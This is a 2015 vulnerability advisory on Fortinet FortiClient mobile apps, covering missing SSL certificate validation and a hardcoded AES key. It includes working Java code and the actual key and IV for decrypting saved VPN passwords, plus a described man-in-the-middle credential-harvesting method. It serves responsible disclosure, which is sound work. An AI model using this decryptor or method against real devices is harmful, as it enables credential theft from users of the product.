Home / os / blackberry

Fortinet FortiClient Hardcoded Encryption Keys / Broken SSL Validation

Posted on 30 January 2015

( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ ____ ____ _____ \____ ==/ /_ _/ ___/ _ / / / | \ \__( <_> ) Y Y /______ /\___|__ / \___ >____/|__|_| / / /.-. / /:wq (x.0) '=.|w|.=' _=''"''=. presents.. Fortinet FortiClient Multiple Vulnerabilities Affected Versions: Verified on FortiClient iOS v5.2.028 and FortiClient Android 5.2.3.091 PDF: http://www.security-assessment.com/files/documents/advisory/Fortinet_FortiClient_Multiple_Vulnerabilities.pdf +-------------+ | Description | +-------------+ This advisory details multiple vulnerabilities found within the Fortinet FortiClient mobile applications. Forticlient is an endpoint security suite, intended to provide an all-in-one security solution. Both the Android and iOS applications did not check the validity of SSL certificates, allowing an attacker performing a Man-In-The-Middle attack to gain access to sensitive information such as SSL VPN credentials and mobile device details. Hard coded encryption keys were discovered within the Android application. These encryption keys were found to be used to encrypt sensitive data stored within the application’s Shared Preferences. As this key does not change per instance, the decrypt code from an instance of a Forticlient application can be used to retrieve the passwords from any other Android Forticlient globally. +--------------+ | Exploitation | +--------------+ --[ Hardcoded Encryption Keys After decompiling the FortiClient Android application, the ‘qm’ class was found to contain a hard coded private string ‘KEY’. The character array was found to contain "FoRtInEt!AnDrOiD". This key is used to encrypt and decrypt saved passwords, stored within the application's shared preferences. The following Java code can be used to decrypt Android Forticlient shared preference parameter encrypted in this manner. import java.util.Locale; import javax.crypto.Cipher; import javax.crypto.spec.IvParameterSpec; import javax.crypto.spec.SecretKeySpec; public final class aa { private static final String KEY = new String(new char[] { 70, 111, 82, 116, 73, 110, 69, 116, 33, 65, 110, 68, 114, 79, 105, 68 }); public static void main(String[] args){ String crypted = "F3792242D92707AD537AACF429D8E28A"; System.out.println("Encrypted String:" + crypted); System.out.println("Decrypted String:" + decrypt(crypted)); } public static String decrypt(String paramString) { try { byte[] arrayOfByte = new byte[paramString.length() / 2]; for (int i = 0; paramString.length() / 2 > i; i++) { int j = Integer.parseInt(paramString.substring(i * 2, 1 + i * 2), 16); arrayOfByte[i] = ((byte)(Integer.parseInt(paramString.substring(1 + i * 2, 2 + i * 2), 16) + j * 16)); } IvParameterSpec localIvParameterSpec = new IvParameterSpec(new byte[] { 117, 122, 39, 67, 114, 124, 115, 44, 113, 116, 124, 123, 58, 89, 118, 94 }); SecretKeySpec localSecretKeySpec = new SecretKeySpec(KEY.getBytes(), "AES"); Cipher localCipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); localCipher.init(2, localSecretKeySpec, localIvParameterSpec); String str = new String(localCipher.doFinal(arrayOfByte)); return str; } catch (Exception localException) { } return null; } } --[ Broken SSL Certificate Validation By performing a Man-In-The-Middle attack, an attacker can host their own SSL server with a self-signed certificate and harvest credentials from legitimate end users. As the FortiClient SSL VPN client and Endpoint Control client do not validate certificates, the attacker can harvest credentials and mobile device information. The Android version of the FortiClient software was found to display a warning prompt when the SSL VPN server’s certificate is not trusted. The iOS version does not display any warnings to the user, regardless of whether or not the ‘check server certificate’ option is enabled (one should note that by default this option is disabled). This exposes FortiClient iOS users to Man-In-The-Middle attacks. The Endpoint Control protocol, which attempts to connect to the devices default gateway on TCP port 8010, similarly does not validate SSL certificates. Both the FortiClient Android and iOS applications were found to ignore certificate validity for the endpoint control protocol and did not prompt the end user when the server’s certificate was invalid. +----------+ | Solution | +----------+ No official solution is currently available for these vulnerabilities. +---------------------+ | Disclosure Timeline | +---------------------+ 08/10/2014 - Initial email sent to Fortinet PSIRT team. 09/10/2014 - Advisory documents sent to Fortinet. 15/10/2014 - Acknowledgement of advisories from Fortinet. 16/10/2014 - Update requested from Fortinet. 02/12/2014 - Update requested from Fortinet. 13/12/2014 - Update requested from Fortinet. 29/01/2015 - Advisory Release. +-------------------------------+ | About Security-Assessment.com | +-------------------------------+ Security-Assessment.com is Australasia's leading team of Information Security consultants specialising in providing high quality Information Security services to clients throughout the Asia Pacific region. Our clients include some of the largest globally recognised companies in areas such as finance, telecommunications, broadcasting, legal and government. Our aim is to provide the very best independent advice and a high level of technical expertise while creating long and lasting professional relationships with our clients. Security-Assessment.com is committed to security research and development, and its team continues to identify and responsibly publish vulnerabilities in public and private software vendor's products. Members of the Security-Assessment.com R&D team are globally recognised through their release of whitepapers and presentations related to new security research. For further information on this issue or any of our service offerings, contact us: Web www.security-assessment.com Email info () security-assessment com Phone +64 4 470 1650

 

TOP